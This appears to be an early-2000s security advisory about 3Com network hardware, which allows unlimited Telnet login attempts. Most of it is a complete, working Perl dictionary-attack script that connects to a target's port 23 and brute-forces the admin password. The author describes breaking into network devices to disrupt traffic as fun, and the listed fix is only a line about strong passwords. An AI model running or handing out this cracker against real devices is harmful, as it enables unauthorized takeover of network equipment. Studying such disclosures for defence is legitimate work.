Vulnerability

    3COM

Affected

    3COM

Description

    "Siberian" found following.   He noticed that  there are  infinity
    retries and no  delay enabled at  3Com hardware, so  he wrote this
    little Telnetcracker for this problem.  He sent it to 3Com.   This
    should work for must 3Com hardware with Telnet config enabled.  It
    was tested it with a PS40 SuperStack II and it worked fine.   Tips
    and suggestions welcome.

    It's really  fun to  crack into  network hardware,  imagine of all
    the nice  features most  devices support...enabling  port, slowing
    down network, building loops...

    By the way, this one needs a dictionary file.

    #!/usr/bin/perl -w
    
    ########################################################
    #                                                      #
    # 3Com Telnet Cracker v0.1b                            #
    # -------------------------                            #
    #                                                      #
    # Telnet implementation arcording to RFC 854           #
    #                                                      #
    # written 2001 by Siberian [www.sentry-labs.com]       #
    #                                                      #
    # Tested with:                                         #
    # Active Perl (Windows NT)                             #
    # Perl 5.stable (Slackware 3.6 & 7.1)                  #
    #                                                      #
    #    This Software is published under GPL v2           #
    #                                                      #
    #         FOR EDUCATIONAL PURPOUSE ONLY!               #
    #                                                      #
    # SRL can't be held responsible for any damgae caused  #
    # by the software, direct or inderectly to anything    #
    # or anyone.                                           #
    #                                                      #
    ########################################################
    
    
    use Socket;
    
    sub guesspass {
    
    $i=1;
    $userh = $userf;
    $userf = join '', $userf, chr(13), chr(10);
    
    recv(SOCK,$ol,1,0);
    while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
        recv(SOCK,$ol,1,0);
    }
    
    while(defined($passwd = <FILE1>)) {
       chop($passwd);
       print ".";
    while($i != 3) {
       if($ol eq "L"){
        send(SOCK,$userf,0);
       }
       if($ol eq "P") {
        $passwd = join '', $passwd, chr(13), chr(10);
        send(SOCK,$passwd,0);
       }
       recv(SOCK,$ol,1,0);
       while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
        recv(SOCK,$ol,1,0);
       }
       if($ol eq "M") {
         print "\n\nPassword for $userh is $passwd\n";
         exit 0;
       }
    $i++
    }
    $i=1;
    }
    print "\n\nIt's sad but true, you failed.\n";
    }
    
    
    print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
    print "Get the latest Version at www.sentry-labs.com\n\n";
    $remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
    $passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
    $userf = shift || ($userf = "admin");
    
    $iaddr = inet_aton($remote) or die "No target host computer found!";
    $paddr = sockaddr_in(23, $iaddr);
    $prot = getprotobyname('tcp');
    socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
    connect(SOCK, $paddr) || die "Can't connect to target host!";
    
    open(FILE1, "$passf") || die "Can't open Password list!";
    recv(SOCK,$ol,1,0);
    $bs = join '', chr(10),chr(13),chr(10);
    send(SOCK, $bs, 0);
    guesspass();
    
    close(FILE1);
    close(SOCK);
    exit 0;

Solution

    Well, password should be random and good one, right?